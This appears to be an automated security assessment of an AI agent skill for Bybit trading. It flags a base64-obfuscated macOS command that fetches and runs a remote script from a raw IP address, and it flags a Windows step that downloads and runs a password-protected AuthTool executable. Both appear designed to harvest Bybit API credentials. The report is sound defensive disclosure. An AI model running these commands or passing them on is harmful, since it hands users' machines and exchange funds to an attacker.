Trust Assessment
bybit-trading received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include: Remote Code Execution and Credential Harvesting via Obfuscated macOS Command; Untrusted Executable Download, Execution, and Credential Harvesting for Windows; and Broad API Key Permissions Amplified by Untrusted Tool Handling.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 25/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)
| Severity | Finding | Details | Layer | Location |
|---|---|---|---|---|
| CRITICAL | Remote Code Execution and Credential Harvesting via Obfuscated macOS Command | The skill instructs macOS users to execute a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/6x8c0trkP4l9uugo)"`. This command downloads and executes an arbitrary script from a suspicious, unverified IP address (`91.92.242.30`). This constitutes a critical remote code execution vulnerability, allowing an attacker to run any code on the user's machine. The skill explicitly states this 'AuthTool service' will 'Configure Bybit API connection,' indicating a high risk of credential harvesting for Bybit API keys and secrets. The use of base64 encoding is a clear attempt to obfuscate this malicious activity. Remediation: Immediately remove the instruction to execute this command. Never instruct users to download and execute code from untrusted or arbitrary sources. All external dependencies must be transparent, auditable, and distributed securely. Implement secure, built-in methods for API key management. | LLM | SKILL.md:35 |
| CRITICAL | Untrusted Executable Download, Execution, and Credential Harvesting for Windows | The skill instructs Windows users to download `AuthTool.zip` from an external GitHub release (`https://github.com/Aslaep123/clawd-authtool/releases/download/released/AuthTool.zip`), extract it with a weak password (`1234`), and run `AuthTool.exe`. This executable is described as configuring the Bybit API connection and verifying its activity. Running an unverified executable from an external source, especially one that handles sensitive API credentials, creates a critical supply chain risk and a high likelihood of credential harvesting. The executable could contain malware, exfiltrate API keys, or perform unauthorized actions on the user's system. The use of a trivial password (`1234`) for the archive further indicates a lack of security best practices. Remediation: Immediately remove the instruction to download and run this untrusted executable. Any tool handling API keys should be open-source, auditable, and integrated directly into the skill's trusted environment, or use secure, established methods for credential management. | LLM | SKILL.md:29 |
| HIGH | Broad API Key Permissions Amplified by Untrusted Tool Handling | The skill requires Bybit API keys to have 'Read-Write for Spot Trading', 'Read-Write for Contract Trading', and 'Read-Write for Wallet' permissions. These permissions are broad, though potentially necessary for a comprehensive trading bot; granting them to the untrusted `AuthTool.exe` (Windows) or the script downloaded by the macOS command significantly amplifies the risk. If the `AuthTool` is compromised (which is highly likely given its distribution method), it gains full, unrestricted control over the user's Bybit account, including trading, asset transfers, and potentially withdrawals, leading to severe financial loss. Remediation: Re-evaluate the necessity of 'Read-Write for Wallet' if the tool does not explicitly manage withdrawals. More importantly, the primary remediation is to replace the untrusted `AuthTool` with a secure, auditable mechanism for API key handling. If a trusted tool is used, these permissions might be acceptable, but in the current context, they are critically excessive. | LLM | SKILL.md:160 |